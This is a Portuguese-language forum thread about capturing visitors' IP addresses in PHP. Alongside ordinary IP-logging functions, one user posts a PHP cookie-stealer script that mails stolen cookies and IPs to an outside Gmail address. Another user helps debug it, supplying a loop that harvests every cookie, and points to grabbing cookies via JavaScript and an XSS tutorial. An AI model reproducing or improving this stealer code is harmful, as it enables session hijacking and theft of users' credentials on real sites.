pegar ip por php [src]

[rog]

renovei o meu traçador de ip

eu ainda pego o resultado em decimal nao pontado para comparar depois numa tabela de ip por paises no mesmo formato

rog

Code Select Expand

####################################################################
function get_ip(){
# get_ip by roger girardin
################################################################
# if the environnement var HTTP_X_FORWARDED_FOR or HTTP_VIA
# then the client ip is HTTP_X_FORWARDED_FOR
#
#   proxy
if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) || isset($_SERVER['HTTP_VIA']))
   {
   $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
   }
# if HTTP_CLIENT_IP is set then the client ip is HTTP_CLIENT_IP
   elseif(isset($_SERVER['HTTP_CLIENT_IP']))
      {
      $ip = $_SERVER['HTTP_CLIENT_IP'];
      }
      # else the client ip is REMOTE_ADDR
   elseif(isset($_SERVER['REMOTE_ADDR']))
      {
      $ip = $_SERVER['REMOTE_ADDR'];
      }
   else
      {
      $ip = "0.0.0.0";   # hidden
      }
$ip_num = 0;
#
if($array_ip = explode(".",$ip))
   {
   $count = count($array_ip);
   #
   for($i = 0; $i < $count; $i++)
      {
      settype($array_ip[$i],"integer");
      $exp = $count - $i -1;
      #
      $ip_num += $array_ip[$i]*pow(256,$exp);
      }
   }
return $ip_num;
}

[insanity]

Cara, primeramente belo post...
Olha esse source:

Code Select Expand

<php?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("ativista@gmail.com", $subject, $msg);
header ("location: http://www.greenpeace.org.br/images/fggreenpeace1.gif");
?>
Tipow eu só estou conseguindo receber o IP, mais nada de cookie

o que pode estar errado?


ate mais

[rog]

isso quero dizer que $_GET['cookie'] nao retornou nada

possivelmente a falha de identificaçao foi patchada mas pode testar com

$_COOKIE

seria :
$cookie = "";
while(list($key,$val) = each($_COOKIE))
{
$cookie .= $key."=".$val."\n";
}

assim seria mais correto

rog

[insanity]

isso quero dizer que $_GET['cookie'] nao retornou nada

possivelmente a falha de identificaçao foi patchada mas pode testar com

$_COOKIE

seria :
$cookie = "";
while(list($key,$val) = each($_COOKIE))
{
$cookie .= $key."=".$val."\n";
}

assim seria mais correto

rog

Valeu aí rog...

[rog]

tambem da para recuperar o cookie com js e loggar com outro arquivo php

lol

esse tuto e em frances mas e bem illustrado

http://www.hsc.fr/~thivillon/04_failles_xss.pdf

rog

[insanity]

Vou ver se arrumo o dicionario aqui ...

agradeço novamente

[rog]

mudei a estrategia,

Code Select Expand

####################################################################
# changing the function to log every ip related var
####################################################################
function get_ip(){
#
$varname = array(0=>"HTTP_VIA","HTTP_X_FORWARDED_FOR","HTTP_CLIENT_IP","REMOTE_ADDR");
$ip = array();
#
for($i = 0; $i < count($varname); $i++)
   {
   if(isset($_SERVER["$varname[$i]"]))
      {
      if(verif_ip($_SERVER["$varname[$i]"]))
         {
         $ip[$i] = $_SERVER["$varname[$i]"];
         }
         else
            {
            $ip[$i] = htmlentities($_SERVER["$varname[$i]"]);
            }
      }
      else
         {
         $ip[$i] = NULL;
         }
   }
#
return $ip;
}
####################################################################
# checking valid ip
####################################################################
function verif_ip($ip){
#
$ip = trim($ip);
#
if($explode = explode(".",$ip))
   {
   $count = count($explode);
   #
   if($count == 4)
      {
      for($i = 0; $i < count($explode); $i++)
         {
         if($explode[$i] < 0 || $explode[$i] > 255)
            {
            return false;
            }
         }
      }
      else
         {
         return false;
         }
   }
   else
      {
      return false;
      }
return true;
}
####################################################################
rog